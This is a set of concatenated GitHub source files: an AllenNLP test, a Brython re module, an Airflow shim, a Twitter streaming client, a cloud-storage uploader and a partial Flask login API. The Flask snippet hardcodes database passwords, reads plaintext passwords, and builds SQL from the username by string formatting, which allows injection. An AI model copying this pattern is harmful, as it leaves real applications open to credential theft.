"ref": "refs/heads/master",
"path": "front-end/testsuite-python-lib/Python-3.0/Lib/test/crashers/loosing_mro_ref.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "1963"
},
{
"name": "Lex",
"bytes": "238458"
},
{
"name": "Makefile",
"bytes": "4513"
},
{
"name": "OCaml",
"bytes": "412695"
},
{
"name": "Python",
"bytes": "17319"
},
{
"name": "Rascal",
"bytes": "523063"
},
{
"name": "Yacc",
"bytes": "429659"
}
],
"symlink_target": ""
} |
import numpy
from numpy.testing import assert_almost_equal
import torch
from torch.nn.parameter import Parameter
from torch.autograd import Variable
from allennlp.common import Params
from allennlp.modules.similarity_functions import LinearSimilarity
from allennlp.common.testing import AllenNlpTestCase
class TestLinearSimilarityFunction(AllenNlpTestCase):
# pylint: disable=protected-access
def test_weights_are_correct_sizes(self):
linear = LinearSimilarity(tensor_1_dim=3, tensor_2_dim=6, combination='x,y')
assert list(linear._weight_vector.size()) == [9]
assert list(linear._bias.size()) == [1]
def test_forward_does_a_weighted_product(self):
linear = LinearSimilarity(3, 1, combination='x,y')
linear._weight_vector = Parameter(torch.FloatTensor([-.3, .5, 2.0, -1.0]))
linear._bias = Parameter(torch.FloatTensor([.1]))
a_vectors = torch.FloatTensor([[[1, 1, 1], [-1, -1, 0]]])
b_vectors = torch.FloatTensor([[[0], [1]]])
result = linear(Variable(a_vectors), Variable(b_vectors)).data.numpy()
assert result.shape == (1, 2,)
assert_almost_equal(result, [[2.3, -1.1]])
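    # Worked check of the expected values above: combination 'x,y' concatenates
    # the inputs, so the rows are [1, 1, 1, 0] and [-1, -1, 0, 1]; dotting them
    # with the weights [-.3, .5, 2.0, -1.0] gives 2.2 and -1.2, and adding the
    # bias .1 yields 2.3 and -1.1.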
def test_forward_works_with_higher_order_tensors(self):
linear = LinearSimilarity(7, 7, combination='x,y')
weights = numpy.random.rand(14)
linear._weight_vector = Parameter(torch.from_numpy(weights).float())
linear._bias = Parameter(torch.FloatTensor([0.]))
a_vectors = numpy.random.rand(5, 4, 3, 6, 7)
b_vectors = numpy.random.rand(5, 4, 3, 6, 7)
result = linear(Variable(torch.from_numpy(a_vectors).float()),
Variable(torch.from_numpy(b_vectors).float()))
result = result.data.numpy()
assert result.shape == (5, 4, 3, 6)
combined_vectors = numpy.concatenate([a_vectors[3, 2, 1, 3, :], b_vectors[3, 2, 1, 3, :]])
expected_result = numpy.dot(combined_vectors, weights)
assert_almost_equal(result[3, 2, 1, 3], expected_result, decimal=6)
def test_forward_works_with_multiply_combinations(self):
linear = LinearSimilarity(2, 2, combination='x*y')
linear._weight_vector = Parameter(torch.FloatTensor([-.3, .5]))
linear._bias = Parameter(torch.FloatTensor([0]))
a_vectors = Variable(torch.FloatTensor([[1, 1], [-1, -1]]))
b_vectors = Variable(torch.FloatTensor([[1, 0], [0, 1]]))
result = linear(a_vectors, b_vectors).data.numpy()
assert result.shape == (2,)
assert_almost_equal(result, [-.3, -.5])
def test_forward_works_with_divide_combinations(self):
linear = LinearSimilarity(2, 2, combination='x/y')
linear._weight_vector = Parameter(torch.FloatTensor([-.3, .5]))
linear._bias = Parameter(torch.FloatTensor([0]))
a_vectors = Variable(torch.FloatTensor([[1, 1], [-1, -1]]))
b_vectors = Variable(torch.FloatTensor([[1, 2], [2, 1]]))
result = linear(a_vectors, b_vectors).data.numpy()
assert result.shape == (2,)
assert_almost_equal(result, [-.05, -.35])
def test_forward_works_with_add_combinations(self):
linear = LinearSimilarity(2, 2, combination='x+y')
linear._weight_vector = Parameter(torch.FloatTensor([-.3, .5]))
linear._bias = Parameter(torch.FloatTensor([0]))
a_vectors = Variable(torch.FloatTensor([[1, 1], [-1, -1]]))
b_vectors = Variable(torch.FloatTensor([[1, 0], [0, 1]]))
result = linear(a_vectors, b_vectors).data.numpy()
assert result.shape == (2,)
assert_almost_equal(result, [-.1, .3])
def test_forward_works_with_subtract_combinations(self):
linear = LinearSimilarity(2, 2, combination='x-y')
linear._weight_vector = Parameter(torch.FloatTensor([-.3, .5]))
linear._bias = Parameter(torch.FloatTensor([0]))
a_vectors = Variable(torch.FloatTensor([[1, 1], [-1, -1]]))
b_vectors = Variable(torch.FloatTensor([[1, 0], [0, 1]]))
result = linear(a_vectors, b_vectors).data.numpy()
assert result.shape == (2,)
assert_almost_equal(result, [.5, -.7])
def test_can_construct_from_params(self):
params = Params({
'tensor_1_dim': 4,
'tensor_2_dim': 4,
'combination': 'x,y,x*y,y-x'
})
linear = LinearSimilarity.from_params(params)
assert list(linear._weight_vector.size()) == [16]
| {
"content_hash": "449a3b376592301fbaf7d42f0c90a3d8",
"timestamp": "",
"source": "github",
"line_count": 90,
"max_line_length": 98,
"avg_line_length": 49.522222222222226,
"alnum_prop": 0.6161094906888042,
"repo_name": "nafitzgerald/allennlp",
"id": "2a5a64030133c129f629f847f1dbedfe9cccf219",
"size": "4501",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/modules/similarity_functions/linear_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "5564"
},
{
"name": "Cuda",
"bytes": "18610"
},
{
"name": "Jupyter Notebook",
"bytes": "36610"
},
{
"name": "Makefile",
"bytes": "1478"
},
{
"name": "Perl",
"bytes": "43067"
},
{
"name": "Python",
"bytes": "1247761"
},
{
"name": "Shell",
"bytes": "13919"
}
],
"symlink_target": ""
} |
r"""Support for regular expressions (RE).
This module provides regular expression matching operations similar to
those found in Perl. It supports both 8-bit and Unicode strings; both
the pattern and the strings being processed can contain null bytes and
characters outside the US ASCII range.
Regular expressions can contain both special and ordinary characters.
Most ordinary characters, like "A", "a", or "0", are the simplest
regular expressions; they simply match themselves. You can
concatenate ordinary characters, so last matches the string 'last'.
The special characters are:
"." Matches any character except a newline.
"^" Matches the start of the string.
"$" Matches the end of the string or just before the newline at
the end of the string.
"*" Matches 0 or more (greedy) repetitions of the preceding RE.
Greedy means that it will match as many repetitions as possible.
"+" Matches 1 or more (greedy) repetitions of the preceding RE.
"?" Matches 0 or 1 (greedy) of the preceding RE.
*?,+?,?? Non-greedy versions of the previous three special characters.
{m,n} Matches from m to n repetitions of the preceding RE.
{m,n}? Non-greedy version of the above.
"\\" Either escapes special characters or signals a special sequence.
[] Indicates a set of characters.
A "^" as the first character indicates a complementing set.
"|" A|B, creates an RE that will match either A or B.
(...) Matches the RE inside the parentheses.
The contents can be retrieved or matched later in the string.
(?aiLmsux) Set the A, I, L, M, S, U, or X flag for the RE (see below).
(?:...) Non-grouping version of regular parentheses.
(?P<name>...) The substring matched by the group is accessible by name.
(?P=name) Matches the text matched earlier by the group named name.
(?#...) A comment; ignored.
(?=...) Matches if ... matches next, but doesn't consume the string.
(?!...) Matches if ... doesn't match next.
(?<=...) Matches if preceded by ... (must be fixed length).
(?<!...) Matches if not preceded by ... (must be fixed length).
(?(id/name)yes|no) Matches yes pattern if the group with id/name matched,
the (optional) no pattern otherwise.
The special sequences consist of "\\" and a character from the list
below. If the ordinary character is not on the list, then the
resulting RE will match the second character.
\number Matches the contents of the group of the same number.
\A Matches only at the start of the string.
\Z Matches only at the end of the string.
\b Matches the empty string, but only at the start or end of a word.
\B Matches the empty string, but not at the start or end of a word.
\d Matches any decimal digit; equivalent to the set [0-9] in
bytes patterns or string patterns with the ASCII flag.
In string patterns without the ASCII flag, it will match the whole
range of Unicode digits.
\D Matches any non-digit character; equivalent to [^\d].
\s Matches any whitespace character; equivalent to [ \t\n\r\f\v] in
bytes patterns or string patterns with the ASCII flag.
In string patterns without the ASCII flag, it will match the whole
range of Unicode whitespace characters.
\S Matches any non-whitespace character; equivalent to [^\s].
\w Matches any alphanumeric character; equivalent to [a-zA-Z0-9_]
in bytes patterns or string patterns with the ASCII flag.
In string patterns without the ASCII flag, it will match the
range of Unicode alphanumeric characters (letters plus digits
plus underscore).
With LOCALE, it will match the set [0-9_] plus characters defined
as letters for the current locale.
\W Matches the complement of \w.
\\ Matches a literal backslash.
This module exports the following functions:
match Match a regular expression pattern to the beginning of a string.
search Search a string for the presence of a pattern.
sub Substitute occurrences of a pattern found in a string.
subn Same as sub, but also return the number of substitutions made.
split Split a string by the occurrences of a pattern.
findall Find all occurrences of a pattern in a string.
finditer Return an iterator yielding a match object for each match.
compile Compile a pattern into a RegexObject.
purge Clear the regular expression cache.
escape Backslash all non-alphanumerics in a string.
Some of the functions in this module take flags as optional parameters:
A ASCII For string patterns, make \w, \W, \b, \B, \d, \D
match the corresponding ASCII character categories
(rather than the whole Unicode categories, which is the
default).
For bytes patterns, this flag is the only available
behaviour and needn't be specified.
I IGNORECASE Perform case-insensitive matching.
L LOCALE Make \w, \W, \b, \B, dependent on the current locale.
M MULTILINE "^" matches the beginning of lines (after a newline)
as well as the string.
"$" matches the end of lines (before a newline) as well
as the end of the string.
S DOTALL "." matches any character at all, including the newline.
X VERBOSE Ignore whitespace and comments for nicer looking RE's.
U UNICODE For compatibility only. Ignored for string patterns (it
is the default), and forbidden for bytes patterns.
This module also defines an exception 'error'.
"""
import sre_compile
import sre_parse
# public symbols
__all__ = [ "match", "search", "sub", "subn", "split", "findall",
"compile", "purge", "template", "escape", "A", "I", "L", "M", "S", "X",
"U", "ASCII", "IGNORECASE", "LOCALE", "MULTILINE", "DOTALL", "VERBOSE",
"UNICODE", "error" ]
__version__ = "2.2.1"
# flags
A = ASCII = sre_compile.SRE_FLAG_ASCII # assume ascii "locale"
I = IGNORECASE = sre_compile.SRE_FLAG_IGNORECASE # ignore case
L = LOCALE = sre_compile.SRE_FLAG_LOCALE # assume current 8-bit locale
U = UNICODE = sre_compile.SRE_FLAG_UNICODE # assume unicode "locale"
M = MULTILINE = sre_compile.SRE_FLAG_MULTILINE # make anchors look for newline
S = DOTALL = sre_compile.SRE_FLAG_DOTALL # make dot match newline
X = VERBOSE = sre_compile.SRE_FLAG_VERBOSE # ignore whitespace and comments
# sre extensions (experimental, don't rely on these)
T = TEMPLATE = sre_compile.SRE_FLAG_TEMPLATE # disable backtracking
DEBUG = sre_compile.SRE_FLAG_DEBUG # dump pattern after compilation
# sre exception
error = sre_compile.error
# --------------------------------------------------------------------
# public interface
def match(pattern, string, flags=0):
"""Try to apply the pattern at the start of the string, returning
a match object, or None if no match was found."""
return _compile(pattern, flags).match(string)
def search(pattern, string, flags=0):
"""Scan through string looking for a match to the pattern, returning
a match object, or None if no match was found."""
return _compile(pattern, flags).search(string)
def sub(pattern, repl, string, count=0, flags=0):
"""Return the string obtained by replacing the leftmost
non-overlapping occurrences of the pattern in string by the
replacement repl. repl can be either a string or a callable;
if a string, backslash escapes in it are processed. If it is
a callable, it's passed the match object and must return
a replacement string to be used."""
return _compile(pattern, flags).sub(repl, string, count)
def subn(pattern, repl, string, count=0, flags=0):
"""Return a 2-tuple containing (new_string, number).
new_string is the string obtained by replacing the leftmost
non-overlapping occurrences of the pattern in the source
string by the replacement repl. number is the number of
substitutions that were made. repl can be either a string or a
callable; if a string, backslash escapes in it are processed.
If it is a callable, it's passed the match object and must
return a replacement string to be used."""
return _compile(pattern, flags).subn(repl, string, count)
def split(pattern, string, maxsplit=0, flags=0):
"""Split the source string by the occurrences of the pattern,
returning a list containing the resulting substrings. If
capturing parentheses are used in pattern, then the text of all
groups in the pattern are also returned as part of the resulting
list. If maxsplit is nonzero, at most maxsplit splits occur,
and the remainder of the string is returned as the final element
of the list."""
return _compile(pattern, flags).split(string, maxsplit)
def findall(pattern, string, flags=0):
"""Return a list of all non-overlapping matches in the string.
If one or more capturing groups are present in the pattern, return
a list of groups; this will be a list of tuples if the pattern
has more than one group.
Empty matches are included in the result."""
return _compile(pattern, flags).findall(string)
def finditer(pattern, string, flags=0):
"""Return an iterator over all non-overlapping matches in the
string. For each match, the iterator returns a match object.
Empty matches are included in the result."""
return _compile(pattern, flags).finditer(string)
def compile(pattern, flags=0):
"Compile a regular expression pattern, returning a pattern object."
#print("_re.py:214")
return _compile(pattern, flags)
def purge():
"Clear the regular expression caches"
_cache.clear()
_cache_repl.clear()
def template(pattern, flags=0):
"Compile a template pattern, returning a pattern object"
return _compile(pattern, flags|T)
_alphanum_str = frozenset(
"_abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890")
_alphanum_bytes = frozenset(
b"_abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890")
def escape(pattern):
"""
Escape all the characters in pattern except ASCII letters, numbers and '_'.
"""
if isinstance(pattern, str):
alphanum = _alphanum_str
s = list(pattern)
for i, c in enumerate(pattern):
if c not in alphanum:
if c == "\000":
s[i] = "\\000"
else:
s[i] = "\\" + c
return "".join(s)
else:
alphanum = _alphanum_bytes
s = []
esc = ord(b"\\")
for c in pattern:
if c in alphanum:
s.append(c)
else:
if c == 0:
s.extend(b"\\000")
else:
s.append(esc)
s.append(c)
return bytes(s)
# --------------------------------------------------------------------
# internals
_cache = {}
_cache_repl = {}
_pattern_type = type(sre_compile.compile("", 0))
_MAXCACHE = 512
def _compile(pattern, flags):
# internal: compile pattern
try:
#fixme brython
#return _cache[type(pattern), pattern, flags]
return _cache["%s:%s:%s" % (type(pattern), pattern, flags)]
except KeyError:
pass
#print(pattern)
if isinstance(pattern, _pattern_type):
if flags:
raise ValueError(
"Cannot process flags argument with a compiled pattern")
return pattern
if not sre_compile.isstring(pattern):
raise TypeError("first argument must be string or compiled pattern")
p = sre_compile.compile(pattern, flags)
#print('_compile', p)
if len(_cache) >= _MAXCACHE:
_cache.clear()
#fix me brython
#_cache[type(pattern), pattern, flags] = p
_cache["%s:%s:%s" % (type(pattern), pattern, flags)]= p
return p
def _compile_repl(repl, pattern):
# internal: compile replacement pattern
try:
#fix me brython
#return _cache_repl[repl, pattern]
return _cache_repl["%s:%s" % (repl, pattern)]
except KeyError:
pass
p = sre_parse.parse_template(repl, pattern)
if len(_cache_repl) >= _MAXCACHE:
_cache_repl.clear()
_cache_repl["%s:%s" % (repl, pattern)] = p
#fix me brython
#_cache_repl[repl, pattern] = p
return p
def _expand(pattern, match, template):
# internal: match.expand implementation hook
template = sre_parse.parse_template(template, pattern)
return sre_parse.expand_template(template, match)
def _subx(pattern, template):
# internal: pattern.sub/subn implementation helper
template = _compile_repl(template, pattern)
if not template[0] and len(template[1]) == 1:
# literal replacement
return template[1][0]
def filter(match, template=template):
return sre_parse.expand_template(template, match)
return filter
# register myself for pickling
import copyreg
def _pickle(p):
return _compile, (p.pattern, p.flags)
copyreg.pickle(_pattern_type, _pickle, _compile)
# --------------------------------------------------------------------
# experimental stuff (see python-dev discussions for details)
class Scanner:
def __init__(self, lexicon, flags=0):
from sre_constants import BRANCH, SUBPATTERN
self.lexicon = lexicon
# combine phrases into a compound pattern
p = []
s = sre_parse.Pattern()
s.flags = flags
for phrase, action in lexicon:
p.append(sre_parse.SubPattern(s, [
(SUBPATTERN, (len(p)+1, sre_parse.parse(phrase, flags))),
]))
s.groups = len(p)+1
p = sre_parse.SubPattern(s, [(BRANCH, (None, p))])
self.scanner = sre_compile.compile(p)
def scan(self, string):
result = []
append = result.append
match = self.scanner.scanner(string).match
i = 0
while 1:
m = match()
if not m:
break
j = m.end()
if i == j:
break
action = self.lexicon[m.lastindex-1][1]
if callable(action):
self.match = m
action = action(self, m.group())
if action is not None:
append(action)
i = j
return result, string[i:]
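# Illustrative, self-contained demo of the public helpers and the experimental
# Scanner class defined above (not part of the original module); run the file
# directly to execute it.
if __name__ == "__main__":
    # Module-level convenience functions.
    assert match(r"\d+", "42 apples").group() == "42"
    assert search(r"(?P<word>\w+)$", "hello world").group("word") == "world"
    assert sub(r"\s+", "-", "a  b   c") == "a-b-c"
    assert findall(r"\d", "a1b2c3") == ["1", "2", "3"]
    # Scanner tokenizes a string with a lexicon of (pattern, action) pairs;
    # a None action drops the matched text (here: whitespace).
    scanner = Scanner([
        (r"\d+", lambda s, tok: ("NUM", tok)),
        (r"[a-z]+", lambda s, tok: ("WORD", tok)),
        (r"\s+", None),
    ])
    tokens, remainder = scanner.scan("abc 123 def")
    assert tokens == [("WORD", "abc"), ("NUM", "123"), ("WORD", "def")]
    assert remainder == ""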
| {
"content_hash": "a511f29c72b4c42e3dce3f70c8a7b1c0",
"timestamp": "",
"source": "github",
"line_count": 352,
"max_line_length": 79,
"avg_line_length": 42.59375,
"alnum_prop": 0.6202894684185953,
"repo_name": "nattee/cafe-grader-web",
"id": "0d27092b0778eaf6dbc171ae6eae763f1aa1331d",
"size": "15507",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "lib/assets/Lib/re.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "6421"
},
{
"name": "CoffeeScript",
"bytes": "3519"
},
{
"name": "HTML",
"bytes": "9510"
},
{
"name": "Haml",
"bytes": "132419"
},
{
"name": "JavaScript",
"bytes": "638225"
},
{
"name": "Python",
"bytes": "5145901"
},
{
"name": "Ruby",
"bytes": "318252"
},
{
"name": "SCSS",
"bytes": "12285"
}
],
"symlink_target": ""
} |
"""This module is deprecated. Please use `airflow.gcp.hooks.datastore`."""
import warnings
# pylint: disable=unused-import
from airflow.gcp.hooks.datastore import DatastoreHook # noqa
warnings.warn(
"This module is deprecated. Please use `airflow.gcp.hooks.datastore`.",
DeprecationWarning, stacklevel=2
)
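# Migration sketch: code that previously imported the hook from this module, e.g.
#     from airflow.contrib.hooks.datastore_hook import DatastoreHook
# should switch to the new location instead:
#     from airflow.gcp.hooks.datastore import DatastoreHook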
| {
"content_hash": "b8c4349ca73371d3ff8f8539992124ed",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 75,
"avg_line_length": 28.90909090909091,
"alnum_prop": 0.7578616352201258,
"repo_name": "Fokko/incubator-airflow",
"id": "da521195fc678c923a8327dd9382e539b3eecf65",
"size": "1129",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "airflow/contrib/hooks/datastore_hook.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "13715"
},
{
"name": "Dockerfile",
"bytes": "14170"
},
{
"name": "HTML",
"bytes": "145596"
},
{
"name": "JavaScript",
"bytes": "25233"
},
{
"name": "Mako",
"bytes": "1339"
},
{
"name": "Python",
"bytes": "8787104"
},
{
"name": "Shell",
"bytes": "187296"
},
{
"name": "TSQL",
"bytes": "879"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from .util import PY_3_OR_HIGHER
if PY_3_OR_HIGHER:
import urllib.request as urllib_request
import urllib.error as urllib_error
else:
import urllib2 as urllib_request
import urllib2 as urllib_error
import json
from ssl import SSLError
import socket
import codecs
import sys, select, time
from .api import TwitterCall, wrap_response, TwitterHTTPError
CRLF = b'\r\n'
MIN_SOCK_TIMEOUT = 0.0 # Apparently select with zero wait is okay!
MAX_SOCK_TIMEOUT = 10.0
HEARTBEAT_TIMEOUT = 90.0
Timeout = {'timeout': True}
Hangup = {'hangup': True}
DecodeError = {'hangup': True, 'decode_error': True}
HeartbeatTimeout = {'hangup': True, 'heartbeat_timeout': True}
class HttpChunkDecoder(object):
def __init__(self):
self.buf = bytearray()
self.munch_crlf = False
def decode(self, data): # -> (bytearray, end_of_stream, decode_error)
chunks = []
buf = self.buf
munch_crlf = self.munch_crlf
end_of_stream = False
decode_error = False
buf.extend(data)
while True:
if munch_crlf:
# Dang, Twitter, you crazy. Twitter only sends a terminating
# CRLF at the beginning of the *next* message.
if len(buf) >= 2:
buf = buf[2:]
munch_crlf = False
else:
break
header_end_pos = buf.find(CRLF)
if header_end_pos == -1:
break
header = buf[:header_end_pos]
data_start_pos = header_end_pos + 2
try:
chunk_len = int(header.decode('ascii'), 16)
except ValueError:
decode_error = True
break
if chunk_len == 0:
end_of_stream = True
break
data_end_pos = data_start_pos + chunk_len
if len(buf) >= data_end_pos:
chunks.append(buf[data_start_pos:data_end_pos])
buf = buf[data_end_pos:]
munch_crlf = True
else:
break
self.buf = buf
self.munch_crlf = munch_crlf
return bytearray().join(chunks), end_of_stream, decode_error
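# Worked example for HttpChunkDecoder.decode (illustrative): feeding
# b"5\r\nhello" returns (bytearray(b"hello"), False, False) and arms munch_crlf;
# a following call with b"\r\n0\r\n" consumes the deferred CRLF, sees the
# zero-length chunk header and returns (bytearray(b""), True, False), i.e.
# end of stream.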
class JsonDecoder(object):
def __init__(self):
self.buf = ""
self.raw_decode = json.JSONDecoder().raw_decode
def decode(self, data):
chunks = []
buf = self.buf + data
while True:
try:
buf = buf.lstrip()
res, ptr = self.raw_decode(buf)
buf = buf[ptr:]
chunks.append(res)
except ValueError:
break
self.buf = buf
return chunks
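# Worked example for JsonDecoder.decode (illustrative): decode('{"a": 1}{"b"')
# returns [{'a': 1}] and keeps the incomplete tail '{"b"' buffered for the
# next call.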
class Timer(object):
def __init__(self, timeout):
# If timeout is None, we never expire.
self.timeout = timeout
self.reset()
def reset(self):
self.time = time.time()
def expired(self):
"""
If expired, reset the timer and return True.
"""
if self.timeout is None:
return False
elif time.time() - self.time > self.timeout:
self.reset()
return True
return False
class SockReader(object):
def __init__(self, sock, sock_timeout):
self.sock = sock
self.sock_timeout = sock_timeout
def read(self):
try:
ready_to_read = select.select([self.sock], [], [], self.sock_timeout)[0]
if ready_to_read:
return self.sock.read()
except SSLError as e:
# Code 2 is error from a non-blocking read of an empty buffer.
if e.errno != 2:
raise
return bytearray()
class TwitterJSONIter(object):
def __init__(self, handle, uri, arg_data, block, timeout, heartbeat_timeout):
self.handle = handle
self.uri = uri
self.arg_data = arg_data
self.timeout_token = Timeout
self.timeout = None
self.heartbeat_timeout = HEARTBEAT_TIMEOUT
if timeout and timeout > 0:
self.timeout = float(timeout)
elif not (block or timeout):
self.timeout_token = None
self.timeout = MIN_SOCK_TIMEOUT
if heartbeat_timeout and heartbeat_timeout > 0:
self.heartbeat_timeout = float(heartbeat_timeout)
def __iter__(self):
timeouts = [t for t in (self.timeout, self.heartbeat_timeout, MAX_SOCK_TIMEOUT)
if t is not None]
sock_timeout = min(*timeouts)
sock = self.handle.fp.raw._sock if PY_3_OR_HIGHER else self.handle.fp._sock.fp._sock
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
headers = self.handle.headers
sock_reader = SockReader(sock, sock_timeout)
chunk_decoder = HttpChunkDecoder()
utf8_decoder = codecs.getincrementaldecoder("utf-8")()
json_decoder = JsonDecoder()
timer = Timer(self.timeout)
heartbeat_timer = Timer(self.heartbeat_timeout)
while True:
# Decode all the things:
try:
data = sock_reader.read()
except SSLError:
yield Hangup
break
dechunked_data, end_of_stream, decode_error = chunk_decoder.decode(data)
unicode_data = utf8_decoder.decode(dechunked_data)
json_data = json_decoder.decode(unicode_data)
# Yield data-like things:
for json_obj in json_data:
yield wrap_response(json_obj, headers)
# Reset timers:
if dechunked_data:
heartbeat_timer.reset()
if json_data:
timer.reset()
# Yield timeouts and special things:
if end_of_stream:
yield Hangup
break
if decode_error:
yield DecodeError
break
if heartbeat_timer.expired():
yield HeartbeatTimeout
break
if timer.expired():
yield self.timeout_token
def handle_stream_response(req, uri, arg_data, block, timeout, heartbeat_timeout):
try:
handle = urllib_request.urlopen(req,)
except urllib_error.HTTPError as e:
raise TwitterHTTPError(e, uri, 'json', arg_data)
return iter(TwitterJSONIter(handle, uri, arg_data, block, timeout, heartbeat_timeout))
class TwitterStream(TwitterCall):
"""
The TwitterStream object is an interface to the Twitter Stream
API. This can be used pretty much the same as the Twitter class
except the result of calling a method will be an iterator that
yields objects decoded from the stream. For example::
twitter_stream = TwitterStream(auth=OAuth(...))
iterator = twitter_stream.statuses.sample()
for tweet in iterator:
# ...do something with this tweet...
By default the ``TwitterStream`` object uses
[public streams](https://dev.twitter.com/docs/streaming-apis/streams/public).
If you want to use one of the other
[streaming APIs](https://dev.twitter.com/docs/streaming-apis), specify the URL
manually.
The iterator will yield until the TCP connection breaks. When the
connection breaks, the iterator yields `{'hangup': True}`, and
raises `StopIteration` if iterated again.
Similarly, if the stream does not produce heartbeats for more than
90 seconds, the iterator yields `{'hangup': True,
'heartbeat_timeout': True}`, and raises `StopIteration` if
iterated again.
The `timeout` parameter controls the maximum time between
yields. If it is nonzero, then the iterator will yield either
stream data or `{'timeout': True}` within the timeout period. This
is useful if you want your program to do other stuff in between
waiting for tweets.
Setting the `block` parameter to `False` makes the stream fully non-blocking. In
this mode, the iterator always yields immediately. It returns
stream data, or `None`. Note that `timeout` supersedes this
argument, so it should also be set to `None` to use this mode.
"""
def __init__(self, domain="stream.twitter.com", secure=True, auth=None,
api_version='1.1', block=True, timeout=None,
heartbeat_timeout=90.0):
uriparts = (str(api_version),)
class TwitterStreamCall(TwitterCall):
def _handle_response(self, req, uri, arg_data, _timeout=None):
return handle_stream_response(
req, uri, arg_data, block,
_timeout or timeout, heartbeat_timeout)
TwitterCall.__init__(
self, auth=auth, format="json", domain=domain,
callable_cls=TwitterStreamCall,
secure=secure, uriparts=uriparts, timeout=timeout, gzip=False)
| {
"content_hash": "f8726a1e97210176da93c593db26110b",
"timestamp": "",
"source": "github",
"line_count": 268,
"max_line_length": 92,
"avg_line_length": 33.26865671641791,
"alnum_prop": 0.5833333333333334,
"repo_name": "sixohsix/twitter",
"id": "142cf1f674de874cfe4edea1c377995f2d005ac4",
"size": "8934",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "twitter/stream.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "143642"
}
],
"symlink_target": ""
} |
import logging
import os
from catapult_base import cloud_storage
from catapult_base.dependency_manager import exceptions
BACKUP_PATH_EXTENSION = 'old'
class CloudStorageUploader(object):
def __init__(self, bucket, remote_path, local_path, cs_backup_path=None):
if not bucket or not remote_path or not local_path:
raise ValueError(
'Attempted to partially initialize upload data with bucket %s, '
'remote_path %s, and local_path %s' % (bucket, remote_path, local_path))
if not os.path.exists(local_path):
raise ValueError('Attempting to initialize CloudStorageUploader with missing '
                 'local path %s' % local_path)
self._cs_bucket = bucket
self._cs_remote_path = remote_path
self._local_path = local_path
self._cs_backup_path = (cs_backup_path or
'%s.%s' % (self._cs_remote_path,
BACKUP_PATH_EXTENSION))
self._updated = False
self._backed_up = False
def Upload(self, force=False):
"""Upload all pending files and then write the updated config to disk.
Will attempt to copy files existing in the upload location to a backup
location in the same bucket in cloud storage if |force| is True.
Args:
force: True if files should be uploaded to cloud storage even if a
file already exists in the upload location.
Raises:
CloudStorageUploadConflictError: If |force| is False and the potential
upload location of a file already exists.
CloudStorageError: If copying an existing file to the backup location
or uploading the new file fails.
"""
if cloud_storage.Exists(self._cs_bucket, self._cs_remote_path):
if not force:
raise exceptions.CloudStorageUploadConflictError(self._cs_bucket,
self._cs_remote_path)
logging.debug('A file already exists at upload path %s in bucket'
' %s', self._cs_remote_path, self._cs_bucket)
try:
cloud_storage.Copy(self._cs_bucket, self._cs_bucket,
self._cs_remote_path, self._cs_backup_path)
self._backed_up = True
except cloud_storage.CloudStorageError:
logging.error('Failed to copy existing file %s in cloud storage bucket '
'%s to backup location %s', self._cs_remote_path, self._cs_bucket,
self._cs_backup_path)
raise
try:
cloud_storage.Insert(
self._cs_bucket, self._cs_remote_path, self._local_path)
except cloud_storage.CloudStorageError:
logging.error('Failed to upload %s to %s in cloud_storage bucket %s',
self._local_path, self._cs_remote_path, self._cs_bucket)
raise
self._updated = True
def Rollback(self):
"""Attempt to undo the previous call to Upload.
Does nothing if no previous call to Upload was made, or if nothing was
successfully changed.
Returns:
True iff changes were successfully rolled back.
Raises:
CloudStorageError: If copying the backed up file to its original
location or removing the uploaded file fails.
"""
cloud_storage_changed = False
if self._backed_up:
cloud_storage.Copy(self._cs_bucket, self._cs_bucket, self._cs_backup_path,
self._cs_remote_path)
cloud_storage_changed = True
self._cs_backup_path = None
elif self._updated:
cloud_storage.Delete(self._cs_bucket, self._cs_remote_path)
cloud_storage_changed = True
self._updated = False
return cloud_storage_changed
def __eq__(self, other, msg=None):
if type(self) != type(other):
return False
return (self._local_path == other._local_path and
self._cs_remote_path == other._cs_remote_path and
self._cs_bucket == other._cs_bucket)
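# Minimal usage sketch (illustrative; the bucket and paths are hypothetical):
#
#   uploader = CloudStorageUploader('my-bucket', 'deps/tool.zip', '/tmp/tool.zip')
#   try:
#     uploader.Upload(force=True)   # backs up any existing remote copy first
#   except cloud_storage.CloudStorageError:
#     uploader.Rollback()           # restore the backup / undo a partial upload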
| {
"content_hash": "c82e38b6520c7cbe64e3e33c2b03fd7f",
"timestamp": "",
"source": "github",
"line_count": 102,
"max_line_length": 80,
"avg_line_length": 38.22549019607843,
"alnum_prop": 0.6334957681456784,
"repo_name": "XiaosongWei/chromium-crosswalk",
"id": "08e9c8f6b35d5159a1af8a40cf240a8e92de1e84",
"size": "4062",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "tools/telemetry/catapult_base/dependency_manager/uploader.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
from flask import Flask, jsonify, request,make_response
from flask.ext.httpauth import HTTPBasicAuth
import json
import MySQLdb
from flask.ext.cors import CORS
app = Flask(__name__)
CORS(app)
#create a temporary users table
users = {"jtramley":"password"}
#MySQL connection information.
#host='localhost',user='jtramley',passwd='ckd9OY5fz',db='jtramley'
hosta='localhost'
usera='bmoore1'
passwda='Q8vdnRru7'
dba='bmoore1'
#setup authentication process
auth = HTTPBasicAuth()
@auth.get_password
def get_password(username):
#if the username is in the users table, return the password.
connection = MySQLdb.connect(host=hosta,user=usera,passwd=passwda,db=dba)
cursor = connection.cursor()
query = "select Password from users where Username='%s'" %(username)
#query = "getPassword('%s')" %(username)
try:
cursor.execute(query)
except:
#Things messed up
return make_response(jsonify({'error':'Failed!'}),404)
